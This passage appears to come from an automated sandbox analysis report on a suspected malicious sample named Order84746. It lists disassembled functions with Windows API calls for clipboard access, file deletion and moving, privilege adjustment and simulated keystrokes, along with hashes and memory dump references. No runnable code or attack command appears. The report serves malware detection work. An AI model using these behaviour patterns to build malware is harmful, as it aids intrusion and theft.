                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 710bfb0e217843dde461c93872237af5a3ec2694fd769cc537dd1b07dd30d717
                          • Instruction ID: 8be2f39ccf00f260706d381c2b22b9164a1bfa763280448b63995b97884f1199
                          • Opcode Fuzzy Hash: 710bfb0e217843dde461c93872237af5a3ec2694fd769cc537dd1b07dd30d717
                          • Instruction Fuzzy Hash: F9F0A070509341CFCB348F62D884812B7E5FF063193209A7EF2DAC2510C3719840DF40
                          Function 008E40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E40C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LongNamePath
                          • String ID:
                          • API String ID: 82841172-0
                          • Opcode ID: b3782463264da5beebb89a0f218ac7ef43c13cf99bf59a3146dccf2fdfca97eb
                          • Instruction ID: ca8641b902de540fa157d21b69b387e93fbf80a9b20c537637821bb8243cfa21
                          • Opcode Fuzzy Hash: b3782463264da5beebb89a0f218ac7ef43c13cf99bf59a3146dccf2fdfca97eb
                          • Instruction Fuzzy Hash: 97E07D32A001241BC7119258CC42FEE339CDFC8790F050074F905D3244D9A0A9808690
                          Function 0092BCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID:
                          • API String ID: 2638373210-0
                          • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                          • Instruction ID: b7c0a1789265cd30186cb1341fe87acb21377e7998d49ac8c409451c24115caa
                          • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                          • Instruction Fuzzy Hash: BBE092B0104B009FD7348A24D810BE373E8EB05305F00085CF6AA83282EB627841C759
                          Function 011DAED8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 011DAEE9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction ID: 6534f562a7f7986fcb9d4f5e12115754e5193810c5111df6a40b9a26ccc147b3
                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction Fuzzy Hash: 92E0E67498410DDFDB00DFB4D54969D7BB4EF04302F1001A1FD01D2280D7309D508A66

                          Non-executed Functions

                          Function 0094F7FF Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0094F87D
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094F8DC
                          • GetWindowLongW.USER32(?,000000F0), ref: 0094F919
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0094F940
                          • SendMessageW.USER32 ref: 0094F966
                          • _wcsncpy.LIBCMT ref: 0094F9D2
                          • GetKeyState.USER32(00000011), ref: 0094F9F3
                          • GetKeyState.USER32(00000009), ref: 0094FA00
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094FA16
                          • GetKeyState.USER32(00000010), ref: 0094FA20
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0094FA4F
                          • SendMessageW.USER32 ref: 0094FA72
                          • SendMessageW.USER32(?,00001030,?,0094E059), ref: 0094FB6F
                          • SetCapture.USER32(?), ref: 0094FB9F
                          • ClientToScreen.USER32(?,?), ref: 0094FC03
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0094FC29
                          • ReleaseCapture.USER32 ref: 0094FC34
                          • GetCursorPos.USER32(?), ref: 0094FC69
                          • ScreenToClient.USER32(?,?), ref: 0094FC76
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0094FCD8
                          • SendMessageW.USER32 ref: 0094FD02
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0094FD41
                          • SendMessageW.USER32 ref: 0094FD6C
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0094FD84
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0094FD8F
                          • GetCursorPos.USER32(?), ref: 0094FDB0
                          • ScreenToClient.USER32(?,?), ref: 0094FDBD
                          • GetParent.USER32(?), ref: 0094FDD9
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0094FE3F
                          • SendMessageW.USER32 ref: 0094FE6F
                          • ClientToScreen.USER32(?,?), ref: 0094FEC5
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0094FEF1
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0094FF19
                          • SendMessageW.USER32 ref: 0094FF3C
                          • ClientToScreen.USER32(?,?), ref: 0094FF86
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0094FFB6
                          • GetWindowLongW.USER32(?,000000F0), ref: 0095004B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3461372671-4164748364
                          • Opcode ID: 1fffb46f8e6d9b0e98c78ae1826689d2ebcab3b7ad083a7a3182d4a11f967c09
                          • Instruction ID: 9f3f6995a420822091afd4c89a47a06e684ff23a9c81f37169f2c5ab9802b3b2
                          • Opcode Fuzzy Hash: 1fffb46f8e6d9b0e98c78ae1826689d2ebcab3b7ad083a7a3182d4a11f967c09
                          • Instruction Fuzzy Hash: 5332AC70608246AFDB10CF68CC94FAABBE8FF49354F140A29F6568B2A1D771DC04DB51
                          Function 0094AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0094B1CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: %d/%02d/%02d
                          • API String ID: 3850602802-328681919
                          • Opcode ID: e6ba38386e33d92263fda2652b2565442b2144cd0526ed74054647f5eb104aeb
                          • Instruction ID: 6c751f080487cfe925b317724bad0cae59c28474f1e1f0a84daccd7699e7e33a
                          • Opcode Fuzzy Hash: e6ba38386e33d92263fda2652b2565442b2144cd0526ed74054647f5eb104aeb
                          • Instruction Fuzzy Hash: 0012D071A54208ABEB248F69CC49FAE7BB8FF49310F104159FA16DB2D1DBB4D941CB21
                          Function 008FEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000), ref: 008FEB4A
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00953AEA
                          • IsIconic.USER32(000000FF), ref: 00953AF3
                          • ShowWindow.USER32(000000FF,00000009), ref: 00953B00
                          • SetForegroundWindow.USER32(000000FF), ref: 00953B0A
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00953B20
                          • GetCurrentThreadId.KERNEL32 ref: 00953B27
                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00953B33
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00953B44
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00953B4C
                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00953B54
                          • SetForegroundWindow.USER32(000000FF), ref: 00953B57
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00953B6C
                          • keybd_event.USER32(00000012,00000000), ref: 00953B77
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00953B81
                          • keybd_event.USER32(00000012,00000000), ref: 00953B86
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00953B8F
                          • keybd_event.USER32(00000012,00000000), ref: 00953B94
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00953B9E
                          • keybd_event.USER32(00000012,00000000), ref: 00953BA3
                          • SetForegroundWindow.USER32(000000FF), ref: 00953BA6
                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00953BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          • Opcode ID: 0db82c3497eaee07b4aa56071777aa4da2a8420610f64dd3137e27943eb08d0e
                          • Instruction ID: 0164b2388e9f30b2d5ce8ea8f2016b9abee95447f0de6f937fabade7174407bd
                          • Opcode Fuzzy Hash: 0db82c3497eaee07b4aa56071777aa4da2a8420610f64dd3137e27943eb08d0e
                          • Instruction Fuzzy Hash: D03163B1B542187BEB205B668C49F7F7F6CEB44B91F108029FA05EA1D0D6F15D00BBA1
                          Function 0091ACC5 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 223COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0091B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0091B180
                            • Part of subcall function 0091B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0091B1AD
                            • Part of subcall function 0091B134: GetLastError.KERNEL32 ref: 0091B1BA
                          • _memset.LIBCMT ref: 0091AD08
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0091AD5A
                          • CloseHandle.KERNEL32(?), ref: 0091AD6B
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0091AD82
                          • GetProcessWindowStation.USER32 ref: 0091AD9B
                          • SetProcessWindowStation.USER32(00000000), ref: 0091ADA5
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0091ADBF
                            • Part of subcall function 0091AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0091ACC0), ref: 0091AB99
                            • Part of subcall function 0091AB84: CloseHandle.KERNEL32(?,?,0091ACC0), ref: 0091ABAB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                          • String ID: $default$winsta0$winsta0\default
                          • API String ID: 2063423040-1685893292
                          • Opcode ID: 9202b89aa997ee50ffe4d1ff337a40092f7e58c6b4c6b468c97aa41f0949209c
                          • Instruction ID: 934839c49302bad077cf61f2beb3c964daf013a98a3fefadea360e21932c8c57
                          • Opcode Fuzzy Hash: 9202b89aa997ee50ffe4d1ff337a40092f7e58c6b4c6b468c97aa41f0949209c
                          • Instruction Fuzzy Hash: E8818DB1A0220DAFEF119FA4DC45AEE7BBDFF08304F044119F924A61A1D7718E95DB62
                          Function 009260DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00925FA6,?), ref: 00926ED8
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00925FA6,?), ref: 00926EF1
                            • Part of subcall function 0092725E: __wsplitpath.LIBCMT ref: 0092727B
                            • Part of subcall function 0092725E: __wsplitpath.LIBCMT ref: 0092728E
                            • Part of subcall function 009272CB: GetFileAttributesW.KERNEL32(?,00926019), ref: 009272CC
                          • _wcscat.LIBCMT ref: 00926149
                          • _wcscat.LIBCMT ref: 00926167
                          • __wsplitpath.LIBCMT ref: 0092618E
                          • FindFirstFileW.KERNEL32(?,?), ref: 009261A4
                          • _wcscpy.LIBCMT ref: 00926209
                          • _wcscat.LIBCMT ref: 0092621C
                          • _wcscat.LIBCMT ref: 0092622F
                          • lstrcmpiW.KERNEL32(?,?), ref: 0092625D
                          • DeleteFileW.KERNEL32(?), ref: 0092626E
                          • MoveFileW.KERNEL32(?,?), ref: 00926289
                          • MoveFileW.KERNEL32(?,?), ref: 00926298
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 009262AD
                          • DeleteFileW.KERNEL32(?), ref: 009262BE
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 009262E1
                          • FindClose.KERNEL32(00000000), ref: 009262FD
                          • FindClose.KERNEL32(00000000), ref: 0092630B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                          • String ID: \*.*
                          • API String ID: 1917200108-1173974218
                          • Opcode ID: a751035f3a97dea39f82098d192664cfa570f1f83f913e7dda6dc13582b526e9
                          • Instruction ID: 3ff575e72b66a41943bf3f042108d405c9b527f4f241a16e16d0051c0f3661a2
                          • Opcode Fuzzy Hash: a751035f3a97dea39f82098d192664cfa570f1f83f913e7dda6dc13582b526e9
                          • Instruction Fuzzy Hash: 8C515072D0912CAACB21EB91DC44EEF77BCAF45300F0500EAE595E3145DE76A7498FA4
                          Function 00936B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32(0097DC00), ref: 00936B36
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00936B44
                          • GetClipboardData.USER32(0000000D), ref: 00936B4C
                          • CloseClipboard.USER32 ref: 00936B58
                          • GlobalLock.KERNEL32(00000000), ref: 00936B74
                          • CloseClipboard.USER32 ref: 00936B7E
                          • GlobalUnlock.KERNEL32(00000000), ref: 00936B93
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00936BA0
                          • GetClipboardData.USER32(00000001), ref: 00936BA8
                          • GlobalLock.KERNEL32(00000000), ref: 00936BB5
                          • GlobalUnlock.KERNEL32(00000000), ref: 00936BE9
                          • CloseClipboard.USER32 ref: 00936CF6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                          • String ID:
                          • API String ID: 3222323430-0
                          • Opcode ID: a6e603fe8c0304e9b6e9ef10d64b891ece9765332eda72567605b5d9983d5757
                          • Instruction ID: 6c1495aaf89012ed13deea68730038fa7cbd575200388919d798ebe31ed2ae65
                          • Opcode Fuzzy Hash: a6e603fe8c0304e9b6e9ef10d64b891ece9765332eda72567605b5d9983d5757
                          • Instruction Fuzzy Hash: A3518B71708201ABD300AB69DD96F6E77A8EF89B11F00442DF6A6D61E1DFA0D8059F62
                          Function 0092F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0092F62B
                          • FindClose.KERNEL32(00000000), ref: 0092F67F
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0092F6A4
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0092F6BB
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0092F6E2
                          • __swprintf.LIBCMT ref: 0092F72E
                          • __swprintf.LIBCMT ref: 0092F767
                          • __swprintf.LIBCMT ref: 0092F7BB
                            • Part of subcall function 0090172B: __woutput_l.LIBCMT ref: 00901784
                          • __swprintf.LIBCMT ref: 0092F809
                          • __swprintf.LIBCMT ref: 0092F858
                          • __swprintf.LIBCMT ref: 0092F8A7
                          • __swprintf.LIBCMT ref: 0092F8F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                          • API String ID: 835046349-2428617273
                          • Opcode ID: 3d611dca2c199ac67a5f0a403cdd764142c1a3131a54c5dc52b73bc96b8de4c5
                          • Instruction ID: 61556d49e9b56b0ecbe9e130d1070c013e2517c17e787c21338cc7ea48702ed2
                          • Opcode Fuzzy Hash: 3d611dca2c199ac67a5f0a403cdd764142c1a3131a54c5dc52b73bc96b8de4c5
                          • Instruction Fuzzy Hash: 32A11EB2508344ABC310EBA9C895DAFB7ECFF99704F40092EF595C2192EB74D949C762
                          Function 00931B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00931B50
                          • _wcscmp.LIBCMT ref: 00931B65
                          • _wcscmp.LIBCMT ref: 00931B7C
                          • GetFileAttributesW.KERNEL32(?), ref: 00931B8E
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00931BA8
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00931BC0
                          • FindClose.KERNEL32(00000000), ref: 00931BCB
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00931BE7
                          • _wcscmp.LIBCMT ref: 00931C0E
                          • _wcscmp.LIBCMT ref: 00931C25
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00931C37
                          • SetCurrentDirectoryW.KERNEL32(009939FC), ref: 00931C55
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00931C5F
                          • FindClose.KERNEL32(00000000), ref: 00931C6C
                          • FindClose.KERNEL32(00000000), ref: 00931C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1803514871-438819550
                          • Opcode ID: cbee774c8336adb6d93d66d5e62ff6f8b99eca28e929f047faaf76b382b9a9b0
                          • Instruction ID: ebe494cf73a5468a0750b8c581be73facea0cc622c5db9dc6e2dc4405a8b2a15
                          • Opcode Fuzzy Hash: cbee774c8336adb6d93d66d5e62ff6f8b99eca28e929f047faaf76b382b9a9b0
                          • Instruction Fuzzy Hash: 5831B532A05219AFDF14AFA4DC49BDE77ACAF45324F104165F815E30A0EBB0DE459E64
                          Function 0094F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • DragQueryPoint.SHELL32(?,?), ref: 0094F37A
                            • Part of subcall function 0094D7DE: ClientToScreen.USER32(?,?), ref: 0094D807
                            • Part of subcall function 0094D7DE: GetWindowRect.USER32(?,?), ref: 0094D87D
                            • Part of subcall function 0094D7DE: PtInRect.USER32(?,?,0094ED5A), ref: 0094D88D
